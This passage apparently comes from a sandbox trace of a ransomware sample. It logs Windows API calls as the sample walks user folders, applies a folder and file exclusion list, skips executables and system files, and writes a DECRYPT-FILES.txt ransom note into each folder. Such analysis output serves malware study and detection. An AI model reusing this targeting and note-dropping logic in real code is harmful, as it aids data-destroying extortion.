(lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="\\All Users") returned 0x0 [0077.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="AhnLab") returned 0x0 [0077.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.808] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\") returned 64 [0077.808] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.808] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\\\jkbimi8.tmp") returned 76 [0077.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp8_1\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0077.808] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\") returned 64 [0077.808] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.808] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\\\DECRYPT-FILES.txt") returned 82 [0077.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp8_1\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0077.810] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0077.810] CloseHandle (hObject=0x44c) returned 1 [0077.811] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\") returned 64 [0077.811] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*" [0077.811] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0077.811] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.811] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.811] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.811] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.811] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa91b380, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9414e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.811] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.811] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa91b380, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.811] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.811] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.811] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.811] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.811] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.811] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.812] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.812] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.812] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.812] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.812] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.812] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.812] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.812] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.812] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.812] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\") returned 64 [0077.812] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.812] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\" [0077.812] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\jkbimi8.tmp" [0077.812] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.812] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp8_1\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.812] CloseHandle (hObject=0x0) returned 0 [0077.812] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.813] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa91b380, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0077.813] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0077.813] CloseHandle (hObject=0x448) returned 1 [0077.813] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IMJP9_0", cAlternateFileName="")) returned 1 [0077.813] lstrcmpW (lpString1="IMJP9_0", lpString2=".") returned 1 [0077.813] lstrcmpW (lpString1="IMJP9_0", lpString2="..") returned 1 [0077.813] lstrcatW (in: lpString1="IMJP9_0", lpString2="\\" | out: lpString1="IMJP9_0\\") returned="IMJP9_0\\" [0077.813] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="IMJP9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\" [0077.813] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="\\Program Files") returned 0x0 [0077.813] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch=":\\Windows") returned 0x0 [0077.813] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="\\Games\\") returned 0x0 [0077.813] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.813] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.813] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.813] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.813] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.813] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="\\All Users") returned 0x0 [0077.813] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.813] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.813] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.813] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="AhnLab") returned 0x0 [0077.813] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.813] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\") returned 64 [0077.813] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.813] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\\\jkbimi8.tmp") returned 76 [0077.813] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp9_0\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0077.814] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\") returned 64 [0077.814] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.814] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\\\DECRYPT-FILES.txt") returned 82 [0077.814] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp9_0\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0077.814] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0077.815] CloseHandle (hObject=0x44c) returned 1 [0077.816] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\") returned 64 [0077.816] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*" [0077.816] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa9414e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9414e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0077.816] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.816] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa9414e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9414e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.816] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.816] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.816] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9414e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9414e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9414e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.816] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.816] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9414e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9414e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9414e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.816] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.816] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.816] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.816] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.816] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.816] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.816] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.816] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.816] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.816] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.817] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.817] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.817] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.817] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.817] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.817] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\") returned 64 [0077.817] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.817] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\" [0077.817] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\jkbimi8.tmp" [0077.817] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.817] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp9_0\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.817] CloseHandle (hObject=0x0) returned 0 [0077.817] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.817] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9414e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9414e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9414e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0077.817] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0077.818] CloseHandle (hObject=0x448) returned 1 [0077.818] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x54b77470, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b77470, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0077.818] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0077.818] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0077.818] lstrcatW (in: lpString1="Internet Explorer", lpString2="\\" | out: lpString1="Internet Explorer\\") returned="Internet Explorer\\" [0077.818] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Internet Explorer\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\" [0077.818] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\Program Files") returned 0x0 [0077.818] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch=":\\Windows") returned 0x0 [0077.818] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\Games\\") returned 0x0 [0077.818] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.818] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.818] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.818] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.818] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.818] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\All Users") returned 0x0 [0077.818] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.818] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.818] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.818] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="AhnLab") returned 0x0 [0077.818] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", 